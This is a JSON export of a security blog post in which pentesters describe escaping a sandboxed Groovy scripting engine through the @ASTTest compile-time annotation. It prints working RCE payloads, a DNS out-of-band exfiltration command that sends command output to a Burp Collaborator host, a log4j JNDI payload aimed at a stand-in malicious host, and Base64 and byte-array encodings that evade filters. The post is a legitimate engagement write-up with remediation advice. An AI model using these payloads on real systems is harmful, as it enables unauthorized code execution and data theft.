{"id":1173,"date":"2022-09-07T12:27:46","date_gmt":"2022-09-07T10:27:46","guid":{"rendered":"https:\/\/security.humanativaspa.it\/?p=1173"},"modified":"2025-09-15T13:32:03","modified_gmt":"2025-09-15T13:32:03","slug":"groovy-template-engine-exploitation-notes-from-a-real-case-scenario","status":"publish","type":"post","link":"https:\/\/hnsecurity.it\/it\/blog\/groovy-template-engine-exploitation-notes-from-a-real-case-scenario\/","title":{"rendered":"Groovy Template Engine Exploitation &#8211; Notes from a real case scenario"},"content":{"rendered":"<p><strong>Java web applications<\/strong> are far from dead in the enterprise world, and with them often come multiple <strong>fancy RCE opportunities<\/strong> for attackers. In particular, template-engine processing and expression-language features (Groovy, Velocity&#8230;) are usually a good place to start when looking for this kind of vulnerability.<\/p>\n<p>In one of our latest penetration testing engagements for a customer, the target application allowed specific users to use a <b>sandboxed Groovy scripting environment<\/b> in order to populate some areas of the application with dynamic content. 
Since the same application had already undergone testing by a competitor, the capabilities of the Groovy shell were limited by some server-side checks, and the attack vectors commonly used to achieve an easy Remote Command Execution were blocked (resulting in a generic Java exception).<\/p>\n<p>So, no <em>&#8220;calc.exe&#8221;.exec()<\/em> nor <em>&#8220;calc.exe&#8221;.execute()<\/em> :\\<\/p>\n<p>But also no:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"groovy\">java.lang.Runtime.getRuntime().exec(\"calc\")\r\nthis.evaluate(\"'calc'.execute()\")<\/pre>\n<p>So we tried to be creative and tested something more complex with reflection, also trying to access local files in addition to the usual RCE:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"groovy\">\"aaa\".getClass().forName(\"java.lang.Runtime\").getDeclaredMethods()[15].invoke(\"calc.exe\")\r\nthis.getClass().forName(\"java.io.File\").getDeclaredMethods()[35].invoke(this.getClass().forName(\"java.io.File\").getDeclaredConstructors()[5].newInstance(\"C:\\\\windows\\\\\"))<\/pre>\n<p>Also NOPE :\\<\/p>\n<p>Everything appeared blocked, including any straightforward method to access local files or web resources like:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"groovy\">new File('c:\/windows\/win.ini').text\r\nnew URL(\"http:\/\/www.google.com\").getText()<\/pre>\n<p>So, we tried to be even more creative, but most of our ideas required instantiating new objects. Unfortunately, after (more than) a couple of tries, we realized that <strong>we couldn&#8217;t instantiate any new object<\/strong>, not just the &#8220;dangerous&#8221; ones (so no &#8220;new&#8221; keyword).<\/p>\n<p>Consequently, we had to find another way to get the objects we needed!<\/p>\n<p>We started investigating which objects were accessible from our scripting environment, to check whether something useful could be found there. 
In this kind of environment, the script context often has access to juicy objects that leak additional information on backend resources. Some examples are the following:<\/p>\n<p>&#8211; Info on the actual scripting environment<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"groovy\">println \"${Script.properties}\"\r\nprintln \"${this.properties}\"\r\nprintln \"${GroovyShell.properties}\"<\/pre>\n<p>&#8211; Info on the system itself<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"groovy\">println System.getProperty(\"user.name\")\r\nprintln System.getProperty(\"java.home\")\r\nprintln System.getProperty(\"java.runtime.version\")<\/pre>\n<p>Since we couldn&#8217;t instantiate any new object, we started looking for already-instantiated objects accessible from our context. Our first try was to look for any <em>java.io.File<\/em> objects present in our context, hoping to obtain configuration files or other juicy files, for example. Even better (but less likely), a <em>ClassLoader<\/em> object to load an arbitrary class. But no luck. Unfortunately, excluding some information on the underlying system, nothing was useful enough to achieve an RCE or a file write\/read.<\/p>\n<p>However, the tests we executed were not completely useless, because they allowed us to understand that <strong>what blocked us was a Security Manager<\/strong>, and a quite well-configured one (not some ad-hoc backend checks on blacklisted inputs).<\/p>\n<p>So, we needed a way to bypass the Security Manager! 
After a lot of research, we found an interesting thread on <a href=\"https:\/\/stackoverflow.com\/questions\/64559260\/how-to-prevent-disable-ast-transformations-in-groovy-scripts\">StackOverflow<\/a> and the referenced <a href=\"https:\/\/github.com\/welk1n\/exploiting-groovy-in-Java\">GitHub repository<\/a>.<\/p>\n<p><img decoding=\"async\" class=\"transparent aligncenter\" src=\"https:\/\/i.kym-cdn.com\/photos\/images\/newsfeed\/001\/493\/280\/38e.png\" alt=\"https:\/\/i.kym-cdn.com\/photos\/images\/newsfeed\/001\/493\/280\/38e.png\" \/><\/p>\n<p>The suggested payload seemed very promising, since it used very basic Groovy syntax and did not require any exotic library; the key point is that the closure passed to <em>@ASTTest<\/em> is executed while the script is being compiled, not when the script body runs:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"groovy\">@groovy.transform.ASTTest(value={assert java.lang.Runtime.getRuntime().exec(\"whoami\")}) \r\ndef x<\/pre>\n<p>The payload &#8220;as is&#8221; did not work (of course!) because in our specific scenario it required an import, easily fixable with <em>import groovy.*;<\/em>.<\/p>\n<p>Aaaand BOOM! <strong>The sandbox was bypassed<\/strong> \ud83d\ude00\u00a0 (good job <em>welk1n<\/em>! 
you deserve way more glory for your work!)<\/p>\n<p>We confirmed the remote command execution via DNS resolution (using the Burp Suite Collaborator server), since we weren&#8217;t able to read the output directly:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"groovy\">import groovy.*;\r\n\r\n@groovy.transform.ASTTest(value={\r\ncmd = \"ping cq6qwx76mos92gp9eo7746dmgdm5au.burpcollaborator.net \"\r\nassert java.lang.Runtime.getRuntime().exec(cmd.split(\" \"))\r\n})\r\ndef x<\/pre>\n<p>A good way to retrieve the output of the injected commands via this out-of-band channel in our limited scenario is the following:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"groovy\">import groovy.*;\r\n\r\n@groovy.transform.ASTTest(value={\r\ncmd = \"whoami\";\r\nout = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmd.split(\" \")).getInputStream()).useDelimiter(\"\\\\A\").next()\r\ncmd2 = \"ping \" + out.replaceAll(\"[^a-zA-Z0-9]\",\"\") + \".cq6qwx76mos92gp9eo7746dmgdm5au.burpcollaborator.net\";\r\njava.lang.Runtime.getRuntime().exec(cmd2.split(\" \"))\r\n})\r\ndef x<\/pre>\n<p>A variation of the previous payload that does not use Java annotations directly (in case for any reason you cannot use them), but that requires instantiating new objects, is the following:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"groovy\">new groovy.lang.GroovyClassLoader().parseClass(\"@groovy.transform.ASTTest(value={assert java.lang.Runtime.getRuntime().exec(\\\"calc.exe\\\")})def x\")<\/pre>\n<p>There can be many other viable ways to achieve the same result, depending on what we can do with the scripting engine and also on which libraries are present. 
As an example of this latter point, if the notorious log4j library is present, we might try to achieve RCE using a payload like this one (not tested, it may contain errors):<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"groovy\">org.apache.log4j.Logger.getLogger(this.getClass()).info(\"${jndi:ldap:\/\/malicioushost\/a}\")<\/pre>\n<p>To remediate the described vulnerability, since it&#8217;s very hard to prevent every possible attack vector, the safest solution is obviously to <strong>remove the Groovy scripting engine \ud83d\ude00<\/strong>\u00a0 If this is not possible, a less radical approach would be to run the scripting engine on a different, isolated system, such as a sandboxed OS or a Docker container, so that a sandbox escape does not directly compromise the application server.<\/p>\n<p><b>NB: The answer to this <\/b><a style=\"font-weight: bold;\" href=\"https:\/\/stackoverflow.com\/a\/64577926\">StackOverflow question<\/a><b> to fix the vulnerability won&#8217;t work, since it&#8217;s almost always possible to bypass this kind of control using encoding:<\/b><\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"groovy\">this.evaluate(new String(java.util.Base64.getDecoder().decode(\"QGdyb292eS50cmFuc2Zvcm0uQVNUVGVzdCh2YWx1ZT17YXNzZXJ0IGphdmEubGFuZy5SdW50aW1lLmdldFJ1bnRpbWUoKS5leGVjKCJpZCIpfSlkZWYgeA==\")))<\/pre>\n<p><strong>even without string literals:<\/strong><\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"groovy\">this.evaluate(new String(new byte[]{64, 103, 114, 111, 111, 118, 121, 46, 116, 114, 97, 110, 115, 102, 111, 114, 109, 46, 65, 83, 84, 84, 101, 115, 116, 40, 118, 97, 108, 117, 101, 61, 123, 97, 115, 115, 101, 114, 116, 32, 106, 97, 118, 97, 46, 108, 97, 110, 103, 46, 82, 117, 110, 116, 105, 109, 101, 46, 103, 101, 116, 82, 117, 110, 116, 105, 109, 101, 40, 41, 46, 101, 120, 101, 99, 40, 34, 105, 100, 34, 41, 125, 41, 100, 101, 102, 32, 120}))<\/pre>\n<p>For those who managed to read the whole blog post and want to dig further into Groovy &#8220;sorcery&#8221;, <a 
href=\"https:\/\/docs.groovy-lang.org\/latest\/html\/documentation\/#_safer_scripting\">here<\/a> you can find the official documentation.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Java web applications are far from dead in the enterprise world and with them often come multiple fancy RCE opportunities [&hellip;]<\/p>\n","protected":false},"author":6,"featured_media":159919,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[78,91],"tags":[115,125,126,127,128,129,130,160,105],"class_list":["post-1173","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-exploits","category-articles","tag-web","tag-el","tag-el-injection","tag-groovy","tag-rce","tag-security-manager","tag-template-injection","tag-log4j","tag-java"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.2 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>HN Security Groovy Template Engine Exploitation - Notes from a real case scenario<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/hnsecurity.it\/it\/blog\/groovy-template-engine-exploitation-notes-from-a-real-case-scenario\/\" \/>\n<meta property=\"og:locale\" content=\"it_IT\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"HN Security Groovy Template Engine Exploitation - Notes from a real case scenario\" \/>\n<meta property=\"og:description\" content=\"Java web applications are far from dead in the enterprise world and with them often come multiple fancy RCE opportunities [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/hnsecurity.it\/it\/blog\/groovy-template-engine-exploitation-notes-from-a-real-case-scenario\/\" \/>\n<meta property=\"og:site_name\" content=\"HN Security\" 
\/>\n<meta property=\"article:published_time\" content=\"2022-09-07T10:27:46+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-09-15T13:32:03+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/hnsecurity.it\/wp-content\/uploads\/2025\/09\/GROOVY.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1600\" \/>\n\t<meta property=\"og:image:height\" content=\"836\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Gianluca Baldi\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@hnsec\" \/>\n<meta name=\"twitter:site\" content=\"@hnsec\" \/>\n<meta name=\"twitter:label1\" content=\"Scritto da\" \/>\n\t<meta name=\"twitter:data1\" content=\"Gianluca Baldi\" \/>\n\t<meta name=\"twitter:label2\" content=\"Tempo di lettura stimato\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minuti\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/hnsecurity.it\/it\/blog\/groovy-template-engine-exploitation-notes-from-a-real-case-scenario\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/hnsecurity.it\/it\/blog\/groovy-template-engine-exploitation-notes-from-a-real-case-scenario\/\"},\"author\":{\"name\":\"Gianluca Baldi\",\"@id\":\"https:\/\/hnsecurity.it\/it\/#\/schema\/person\/251b6740cfa820dd94ab485c48adb8f5\"},\"headline\":\"Groovy Template Engine Exploitation &#8211; Notes from a real case 
scenario\",\"datePublished\":\"2022-09-07T10:27:46+00:00\",\"dateModified\":\"2025-09-15T13:32:03+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/hnsecurity.it\/it\/blog\/groovy-template-engine-exploitation-notes-from-a-real-case-scenario\/\"},\"wordCount\":771,\"publisher\":{\"@id\":\"https:\/\/hnsecurity.it\/it\/#organization\"},\"image\":{\"@id\":\"https:\/\/hnsecurity.it\/it\/blog\/groovy-template-engine-exploitation-notes-from-a-real-case-scenario\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/hnsecurity.it\/wp-content\/uploads\/2025\/09\/GROOVY.jpg\",\"keywords\":[\"web\",\"EL\",\"EL Injection\",\"groovy\",\"RCE\",\"Security Manager\",\"Template Injection\",\"log4j\",\"Java\"],\"articleSection\":[\"Exploits\",\"Articles\"],\"inLanguage\":\"it-IT\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/hnsecurity.it\/it\/blog\/groovy-template-engine-exploitation-notes-from-a-real-case-scenario\/\",\"url\":\"https:\/\/hnsecurity.it\/it\/blog\/groovy-template-engine-exploitation-notes-from-a-real-case-scenario\/\",\"name\":\"HN Security Groovy Template Engine Exploitation - Notes from a real case 
scenario\",\"isPartOf\":{\"@id\":\"https:\/\/hnsecurity.it\/it\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/hnsecurity.it\/it\/blog\/groovy-template-engine-exploitation-notes-from-a-real-case-scenario\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/hnsecurity.it\/it\/blog\/groovy-template-engine-exploitation-notes-from-a-real-case-scenario\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/hnsecurity.it\/wp-content\/uploads\/2025\/09\/GROOVY.jpg\",\"datePublished\":\"2022-09-07T10:27:46+00:00\",\"dateModified\":\"2025-09-15T13:32:03+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/hnsecurity.it\/it\/blog\/groovy-template-engine-exploitation-notes-from-a-real-case-scenario\/#breadcrumb\"},\"inLanguage\":\"it-IT\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/hnsecurity.it\/it\/blog\/groovy-template-engine-exploitation-notes-from-a-real-case-scenario\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"it-IT\",\"@id\":\"https:\/\/hnsecurity.it\/it\/blog\/groovy-template-engine-exploitation-notes-from-a-real-case-scenario\/#primaryimage\",\"url\":\"https:\/\/hnsecurity.it\/wp-content\/uploads\/2025\/09\/GROOVY.jpg\",\"contentUrl\":\"https:\/\/hnsecurity.it\/wp-content\/uploads\/2025\/09\/GROOVY.jpg\",\"width\":1600,\"height\":836,\"caption\":\"Groovy logo\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/hnsecurity.it\/it\/blog\/groovy-template-engine-exploitation-notes-from-a-real-case-scenario\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/hnsecurity.it\/it\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Groovy Template Engine Exploitation &#8211; Notes from a real case scenario\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/hnsecurity.it\/it\/#website\",\"url\":\"https:\/\/hnsecurity.it\/it\/\",\"name\":\"HN Security\",\"description\":\"Offensive Security 
Specialists\",\"publisher\":{\"@id\":\"https:\/\/hnsecurity.it\/it\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/hnsecurity.it\/it\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"it-IT\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/hnsecurity.it\/it\/#organization\",\"name\":\"HN Security\",\"url\":\"https:\/\/hnsecurity.it\/it\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"it-IT\",\"@id\":\"https:\/\/hnsecurity.it\/it\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/hnsecurity.it\/wp-content\/uploads\/2026\/01\/hn-libellula.jpg\",\"contentUrl\":\"https:\/\/hnsecurity.it\/wp-content\/uploads\/2026\/01\/hn-libellula.jpg\",\"width\":696,\"height\":696,\"caption\":\"HN Security\"},\"image\":{\"@id\":\"https:\/\/hnsecurity.it\/it\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/x.com\/hnsec\",\"https:\/\/www.linkedin.com\/company\/hnsecurity\/\",\"https:\/\/github.com\/hnsecurity\",\"https:\/\/infosec.exchange\/@hnsec\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/hnsecurity.it\/it\/#\/schema\/person\/251b6740cfa820dd94ab485c48adb8f5\",\"name\":\"Gianluca Baldi\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"it-IT\",\"@id\":\"https:\/\/secure.gravatar.com\/avatar\/6c4f5412911567e4668543570703da4320bfcc5f3dcb1c89541bd2d7eb285690?s=96&d=mm&r=g\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/6c4f5412911567e4668543570703da4320bfcc5f3dcb1c89541bd2d7eb285690?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/6c4f5412911567e4668543570703da4320bfcc5f3dcb1c89541bd2d7eb285690?s=96&d=mm&r=g\",\"caption\":\"Gianluca Baldi\"},\"url\":\"https:\/\/hnsecurity.it\/it\/blog\/author\/gianluca-baldi\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. 
-->","yoast_head_json":{"title":"HN Security Groovy Template Engine Exploitation - Notes from a real case scenario","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/hnsecurity.it\/it\/blog\/groovy-template-engine-exploitation-notes-from-a-real-case-scenario\/","og_locale":"it_IT","og_type":"article","og_title":"HN Security Groovy Template Engine Exploitation - Notes from a real case scenario","og_description":"Java web applications are far from dead in the enterprise world and with them often come multiple fancy RCE opportunities [&hellip;]","og_url":"https:\/\/hnsecurity.it\/it\/blog\/groovy-template-engine-exploitation-notes-from-a-real-case-scenario\/","og_site_name":"HN Security","article_published_time":"2022-09-07T10:27:46+00:00","article_modified_time":"2025-09-15T13:32:03+00:00","og_image":[{"width":1600,"height":836,"url":"https:\/\/hnsecurity.it\/wp-content\/uploads\/2025\/09\/GROOVY.jpg","type":"image\/jpeg"}],"author":"Gianluca Baldi","twitter_card":"summary_large_image","twitter_creator":"@hnsec","twitter_site":"@hnsec","twitter_misc":{"Scritto da":"Gianluca Baldi","Tempo di lettura stimato":"5 minuti"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/hnsecurity.it\/it\/blog\/groovy-template-engine-exploitation-notes-from-a-real-case-scenario\/#article","isPartOf":{"@id":"https:\/\/hnsecurity.it\/it\/blog\/groovy-template-engine-exploitation-notes-from-a-real-case-scenario\/"},"author":{"name":"Gianluca Baldi","@id":"https:\/\/hnsecurity.it\/it\/#\/schema\/person\/251b6740cfa820dd94ab485c48adb8f5"},"headline":"Groovy Template Engine Exploitation &#8211; Notes from a real case 
scenario","datePublished":"2022-09-07T10:27:46+00:00","dateModified":"2025-09-15T13:32:03+00:00","mainEntityOfPage":{"@id":"https:\/\/hnsecurity.it\/it\/blog\/groovy-template-engine-exploitation-notes-from-a-real-case-scenario\/"},"wordCount":771,"publisher":{"@id":"https:\/\/hnsecurity.it\/it\/#organization"},"image":{"@id":"https:\/\/hnsecurity.it\/it\/blog\/groovy-template-engine-exploitation-notes-from-a-real-case-scenario\/#primaryimage"},"thumbnailUrl":"https:\/\/hnsecurity.it\/wp-content\/uploads\/2025\/09\/GROOVY.jpg","keywords":["web","EL","EL Injection","groovy","RCE","Security Manager","Template Injection","log4j","Java"],"articleSection":["Exploits","Articles"],"inLanguage":"it-IT"},{"@type":"WebPage","@id":"https:\/\/hnsecurity.it\/it\/blog\/groovy-template-engine-exploitation-notes-from-a-real-case-scenario\/","url":"https:\/\/hnsecurity.it\/it\/blog\/groovy-template-engine-exploitation-notes-from-a-real-case-scenario\/","name":"HN Security Groovy Template Engine Exploitation - Notes from a real case 
scenario","isPartOf":{"@id":"https:\/\/hnsecurity.it\/it\/#website"},"primaryImageOfPage":{"@id":"https:\/\/hnsecurity.it\/it\/blog\/groovy-template-engine-exploitation-notes-from-a-real-case-scenario\/#primaryimage"},"image":{"@id":"https:\/\/hnsecurity.it\/it\/blog\/groovy-template-engine-exploitation-notes-from-a-real-case-scenario\/#primaryimage"},"thumbnailUrl":"https:\/\/hnsecurity.it\/wp-content\/uploads\/2025\/09\/GROOVY.jpg","datePublished":"2022-09-07T10:27:46+00:00","dateModified":"2025-09-15T13:32:03+00:00","breadcrumb":{"@id":"https:\/\/hnsecurity.it\/it\/blog\/groovy-template-engine-exploitation-notes-from-a-real-case-scenario\/#breadcrumb"},"inLanguage":"it-IT","potentialAction":[{"@type":"ReadAction","target":["https:\/\/hnsecurity.it\/it\/blog\/groovy-template-engine-exploitation-notes-from-a-real-case-scenario\/"]}]},{"@type":"ImageObject","inLanguage":"it-IT","@id":"https:\/\/hnsecurity.it\/it\/blog\/groovy-template-engine-exploitation-notes-from-a-real-case-scenario\/#primaryimage","url":"https:\/\/hnsecurity.it\/wp-content\/uploads\/2025\/09\/GROOVY.jpg","contentUrl":"https:\/\/hnsecurity.it\/wp-content\/uploads\/2025\/09\/GROOVY.jpg","width":1600,"height":836,"caption":"Groovy logo"},{"@type":"BreadcrumbList","@id":"https:\/\/hnsecurity.it\/it\/blog\/groovy-template-engine-exploitation-notes-from-a-real-case-scenario\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/hnsecurity.it\/it\/"},{"@type":"ListItem","position":2,"name":"Groovy Template Engine Exploitation &#8211; Notes from a real case scenario"}]},{"@type":"WebSite","@id":"https:\/\/hnsecurity.it\/it\/#website","url":"https:\/\/hnsecurity.it\/it\/","name":"HN Security","description":"Offensive Security 
Specialists","publisher":{"@id":"https:\/\/hnsecurity.it\/it\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/hnsecurity.it\/it\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"it-IT"},{"@type":"Organization","@id":"https:\/\/hnsecurity.it\/it\/#organization","name":"HN Security","url":"https:\/\/hnsecurity.it\/it\/","logo":{"@type":"ImageObject","inLanguage":"it-IT","@id":"https:\/\/hnsecurity.it\/it\/#\/schema\/logo\/image\/","url":"https:\/\/hnsecurity.it\/wp-content\/uploads\/2026\/01\/hn-libellula.jpg","contentUrl":"https:\/\/hnsecurity.it\/wp-content\/uploads\/2026\/01\/hn-libellula.jpg","width":696,"height":696,"caption":"HN Security"},"image":{"@id":"https:\/\/hnsecurity.it\/it\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/hnsec","https:\/\/www.linkedin.com\/company\/hnsecurity\/","https:\/\/github.com\/hnsecurity","https:\/\/infosec.exchange\/@hnsec"]},{"@type":"Person","@id":"https:\/\/hnsecurity.it\/it\/#\/schema\/person\/251b6740cfa820dd94ab485c48adb8f5","name":"Gianluca Baldi","image":{"@type":"ImageObject","inLanguage":"it-IT","@id":"https:\/\/secure.gravatar.com\/avatar\/6c4f5412911567e4668543570703da4320bfcc5f3dcb1c89541bd2d7eb285690?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/6c4f5412911567e4668543570703da4320bfcc5f3dcb1c89541bd2d7eb285690?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/6c4f5412911567e4668543570703da4320bfcc5f3dcb1c89541bd2d7eb285690?s=96&d=mm&r=g","caption":"Gianluca 
Baldi"},"url":"https:\/\/hnsecurity.it\/it\/blog\/author\/gianluca-baldi\/"}]}},"jetpack_featured_media_url":"https:\/\/hnsecurity.it\/wp-content\/uploads\/2025\/09\/GROOVY.jpg","_links":{"self":[{"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/posts\/1173","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/users\/6"}],"replies":[{"embeddable":true,"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/comments?post=1173"}],"version-history":[{"count":1,"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/posts\/1173\/revisions"}],"predecessor-version":[{"id":160155,"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/posts\/1173\/revisions\/160155"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/media\/159919"}],"wp:attachment":[{"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/media?parent=1173"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/categories?post=1173"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/tags?post=1173"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}